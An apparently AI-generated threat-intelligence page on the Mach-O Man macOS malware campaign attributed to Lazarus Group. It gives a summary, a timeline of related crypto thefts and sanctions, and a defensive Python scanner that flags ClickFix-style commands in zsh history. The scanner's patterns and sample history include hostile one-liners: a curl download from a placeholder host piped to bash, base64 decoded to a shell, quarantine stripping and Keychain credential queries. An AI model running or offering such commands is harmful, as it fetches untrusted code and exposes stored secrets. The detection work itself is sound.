Mach-O Man Malware Campaign (Lazarus / Chollima)
Summary
Mach-O Man is a four-stage macOS malware kit attributed to North Korea's Lazarus Group (Chollima division), publicly disclosed in April 2026 by researchers at Bitso's Quetzal Team and the ANY.RUN sandbox platform. The campaign uses ClickFix social engineering — fake meeting invitations delivered via Telegram — to trick cryptocurrency and fintech executives into pasting a command into Terminal themselves; that command deploys a modular toolkit that steals macOS Keychain secrets, browser credentials, session cookies, and crypto wallet extension data. CertiK and other researchers have linked the campaign to Lazarus Group and to the Drift Protocol and KelpDAO exploits, which together took over $575 million in April 2026 alone, and Lazarus Group's cumulative cryptocurrency theft since 2017 is estimated to exceed $7.3 billion.
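The check a responder wants from the summary above is a way to spot the ClickFix step itself: the victim pastes a one-liner into Terminal, so it lands in shell history (zsh is the macOS default), and the follow-on credential theft often leaves further command-line traces. The Python below is an added example written by the editor, not code or tooling from the Bitso/ANY.RUN analysis. It parses zsh extended-history lines and flags commands matching heuristic signatures (curl/wget piped to a shell, base64-decoded payloads piped to a shell, inline osascript, quarantine-attribute stripping, and `security` Keychain queries). The signatures, the host path and the history lines are the editor's constructed assumptions, not published IOCs; the campaign's real commands are not reproduced on this page.

```python
"""Flag ClickFix-style one-liners and follow-on Keychain access in zsh history.

Added example (editor's own heuristics, not the researchers' tooling).
All sample data below is constructed; nothing here is a published IOC.
"""
import re
from typing import List, Tuple

# zsh EXTENDED_HISTORY format: ": <epoch>:<duration>;<command>". Plain lines
# (no timestamp) are also accepted because HISTFILE is not always extended.
_EXT_LINE = re.compile(r"^: (?P<ts>\d+):\d+;(?P<cmd>.*)$")

# Heuristic signatures for a pasted lure and the post-exploitation steps the
# summary describes. Assumptions by the editor, not observed campaign commands.
SIGNATURES = {
    # remote script fetched and piped straight into a shell
    "remote_pipe_to_shell": re.compile(
        r"\b(curl|wget)\b[^|;]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b"),
    # base64-decoded payload piped into a shell (macOS base64 accepts -D)
    "base64_decode_to_shell": re.compile(
        r"base64\s+(?:-d|-D|--decode)\b[^|;]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b"),
    # inline AppleScript, a common way to pop a fake password prompt
    "osascript_inline": re.compile(r"\bosascript\s+-e\b"),
    # Keychain CLI queries (e.g. the Chrome Safe Storage key)
    "keychain_access": re.compile(
        r"\bsecurity\s+(?:dump-keychain|find-(?:generic|internet)-password)\b"),
    # clearing com.apple.quarantine so Gatekeeper does not inspect the binary
    "quarantine_strip": re.compile(
        r"\bxattr\b[^|;]*(?:-c\b|com\.apple\.quarantine)"),
}


def parse_history_line(line: str) -> Tuple[int, str]:
    """Return (epoch, command) for one history line; epoch 0 if not extended."""
    m = _EXT_LINE.match(line.rstrip("\n"))
    if m:
        return int(m.group("ts")), m.group("cmd")
    return 0, line.rstrip("\n")


def classify(cmd: str) -> List[str]:
    """Names of every signature the command matches (empty list if benign)."""
    return [name for name, rx in SIGNATURES.items() if rx.search(cmd)]


def scan_history(lines) -> List[Tuple[int, str, List[str]]]:
    """Flag each suspicious command with its timestamp and matched signatures."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        ts, cmd = parse_history_line(line)
        tags = classify(cmd)
        if tags:
            findings.append((ts, cmd, tags))
    return findings


# Constructed sample history, NOT a real capture. The first three commands are
# ordinary activity; the rest mimic a pasted lure and post-exploitation steps.
SAMPLE_HISTORY = """\
: 1775000000:0;git pull
: 1775000010:0;brew upgrade
: 1775000020:0;curl -I https://example.invalid/
: 1775000600:0;curl -fsSL https://example.invalid/meet.sh | bash
: 1775000610:0;echo aGVsbG8= | base64 -D | sh
: 1775000620:0;xattr -c ~/Downloads/MeetingHelper
: 1775000630:0;security find-generic-password -ga "Chrome Safe Storage"
"""


if __name__ == "__main__":
    # Usage on a suspect host: scan_history(open("~/.zsh_history" expanded))
    for ts, cmd, tags in scan_history(SAMPLE_HISTORY.splitlines()):
        print(f"{ts}  {', '.join(tags):<24} {cmd}")
```

Run it against `~/.zsh_history` (or `~/.bash_history`) on the suspect host. Two caveats: a multi-line command is stored with a trailing backslash continuation, which this parser does not rejoin, and a lure executed through a GUI dialog rather than Terminal leaves no history entry at all, so pair the scan with unified-log and process-execution review rather than treating an empty result as clean.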
Timeline (13 events)
2007-01-01
Lazarus Group established by the North Korean government, subordinate to the 110th Research Center, 3rd Bureau of the RGB, according to U.S. Treasury (date approximate; Treasury says "as early as 2007").
U.S. Treasury OFAC Press Release SM774
2019-09-13
OFAC designates Lazarus Group, Bluenoroff, and Andariel as SDNs under Executive Order 13722, prohibiting U.S. persons from transacting with them.
U.S. Treasury OFAC
2020-03-02
OFAC sanctions two Chinese nationals for laundering cryptocurrency on behalf of Lazarus Group.
U.S. Treasury OFAC
2020-08-01
U.S. DOJ files a complaint seeking forfeiture of 280 cryptocurrency addresses linked to North Korean exchange hackers, supported by Chainalysis tracing.
Chainalysis Blog
2022-05-06
OFAC issues the first-ever sanctions on a virtual currency mixer (Blender.io), citing its use to launder proceeds of DPRK-linked hacks; Tornado Cash was sanctioned on the same grounds in August 2022.
U.S. Treasury OFAC
2025-01-01
Chainalysis estimates DPRK-linked actors stole $2.02 billion during 2025, a 51% year-over-year increase, per its 2026 crypto crime report.
CryptoTimes / Chainalysis
2025-09-01
Alleged start of a six-month social engineering operation targeting Drift Protocol, with DPRK-linked operatives attending conferences and building relationships with contributors (approximate date per reporting).
The Hacker News
2026-04-01
Drift Protocol exploited for approximately $285–295 million via social engineering and durable nonce manipulation. Attributed with medium confidence to UNC4736 (Citrine Sleet / Golden Chollima), a DPRK-linked cluster.
Bloomberg / The Hacker News / TRM Labs
2026-04-18
KelpDAO bridge exploited for approximately $290–293 million (116,500 rsETH) via compromised RPC nodes and a single-point-of-failure DVN configuration. LayerZero and Chainalysis attribute the attack to Lazarus Group.
BleepingComputer / Chainalysis / CoinDesk
2026-04-21
Researchers at Bitso's Quetzal Team and ANY.RUN (analyst: Mauro Eldritch) publicly disclose the Mach-O Man malware kit, publishing a full technical analysis including binary names, IOCs, and the four-stage attack chain.
ANY.RUN Cybersecurity Blog
2026-04-22
CertiK publishes analysis linking the Mach-O Man campaign to Lazarus Group and connecting it to the Drift and KelpDAO exploits. CoinDesk covers the story.
CoinDesk
2026-04-22
Arbitrum reportedly freezes $71 million in funds linked to the KelpDAO exploit.
Bitcoin News
2026-05-05
Drift Protocol publishes a recovery plan for affected users following the $285–295 million DPRK-linked exploit.
CoinDesk
Decision Log
- hash: 69tyXeNe38meFGL6wsrEwJ192xUuw6qJH6VrVy51HaFW
This investigation is cryptographically anchored to the Solana blockchain and source URLs are archived via the Internet Archive.
model: claude-sonnet-4-6
generated: 6/7/2026, 11:05:18 PM
last updated: 6/7/2026, 11:05:29 PM
avoid.net — verified advice for a post-truth world